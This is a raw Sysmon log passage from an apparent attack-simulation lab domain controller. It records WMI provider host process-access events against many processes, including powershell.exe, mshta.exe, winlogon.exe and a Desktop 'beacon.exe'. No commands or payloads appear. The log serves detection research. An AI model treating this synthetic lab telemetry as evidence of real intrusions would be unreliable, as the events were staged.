16:52:52.309{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7A5F-6039-4410-00000000AD01}2140C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236997Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.309{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7949-6039-1B10-00000000AD01}5344C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236996Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.309{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7948-6039-1A10-00000000AD01}4808C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236995Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.309{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1910-00000000AD01}5136C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236994Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.309{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1810-00000000AD01}4892C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236993Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.309{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7946-6039-1610-00000000AD01}3144C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236992Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.309{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B70F-00000000AD01}5892C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236991Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.293{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B60F-00000000AD01}5836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236990Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.293{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74FB-6039-800F-00000000AD01}6628C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236989Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.293{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-780F-00000000AD01}6760C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236988Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.293{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-770F-00000000AD01}7048C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236987Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.293{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-72C7-6039-2E0F-00000000AD01}4048C:\Users\Administrator\Desktop\beacon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236986Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.293{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CBF-6039-3A0E-00000000AD01}4736C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236985Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.293{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-32CA-6039-2C07-00000000AD01}1356C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236984Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.293{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CD05-00000000AD01}656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236983Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.293{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CA05-00000000AD01}4956C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236982Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.293{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C405-00000000AD01}5096C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236981Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.293{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C105-00000000AD01}1648C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236980Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.293{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-232D-6039-D900-00000000AD01}3148C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236979Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.293{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5500-00000000AD01}3736C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236978Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.293{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5100-00000000AD01}3532C:\Program 